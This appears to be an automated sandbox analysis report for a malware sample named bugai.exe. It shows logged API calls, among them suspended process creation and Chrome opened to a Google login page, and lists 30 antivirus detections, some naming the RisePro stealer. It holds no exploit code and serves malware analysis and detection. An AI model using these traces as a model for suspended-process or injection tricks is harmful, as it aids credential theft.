CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2172 thread_handle: 0x0000033c process_identifier: 1400 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1728 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000340	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 1400	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000003e8 suspend_count: 1 process_identifier: 1728	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 1728	1	0
NtGetContextThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x00000460	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 1400	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 1400	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 1400	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000680 suspend_count: 1 process_identifier: 1400	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000001d4 suspend_count: 1 process_identifier: 2372	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 2372	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 2372	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 2992	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2992	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 1964	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2508 thread_handle: 0x0000029c process_identifier: 2260 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b0	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2260	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2532 thread_handle: 0x0000000000000098 process_identifier: 2572 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 1616 thread_handle: 0x0000000000000144 process_identifier: 1848 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2508 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000000000000214 suspend_count: 1 process_identifier: 2260	1	0
CreateProcessInternalW Feb. 16, 2024, 7:59 a.m.	thread_identifier: 1544 thread_handle: 0x000000000000058c process_identifier: 3384 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1272,16880712170299029567,8661231629257431247,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=182E76C214089160938B9224E3187C07 --mojo-platform-channel-handle=1304 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000530	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000000000000cc suspend_count: 1 process_identifier: 2572	1	0
NtGetContextThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0
NtGetContextThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154	1	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0
NtGetContextThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154	1	0

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.536670
ALYac	Gen:Variant.Zusy.536670
Cylance	unsafe
Sangfor	Suspicious.Win32.Save.a
Cybereason	malicious.7890cc
BitDefenderTheta	Gen:NN.ZexaF.36744.sE0aaGfRMpnk
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
Cynet	Malicious (score: 100)
BitDefender	Gen:Variant.Zusy.536670
VIPRE	Gen:Variant.Zusy.536670
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.04354f40a9b6cd2f
Sophos	Mal/RisePro-A
MAX	malware (ai score=85)
Gridinsoft	Trojan.Heur!.038120A1
Arcabit	Trojan.Zusy.D8305E
ZoneAlarm	VHO:Trojan.Win32.Convagent.gen
GData	Gen:Variant.Zusy.536670
Google	Detected
AhnLab-V3	Trojan/Win.TrojanX-gen.R635050
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.MalPack
Zoner	Probably Heur.ExeHeaderL
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Agent.BFB5!tr
CrowdStrike	win/malicious_confidence_100% (W)

bugai.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All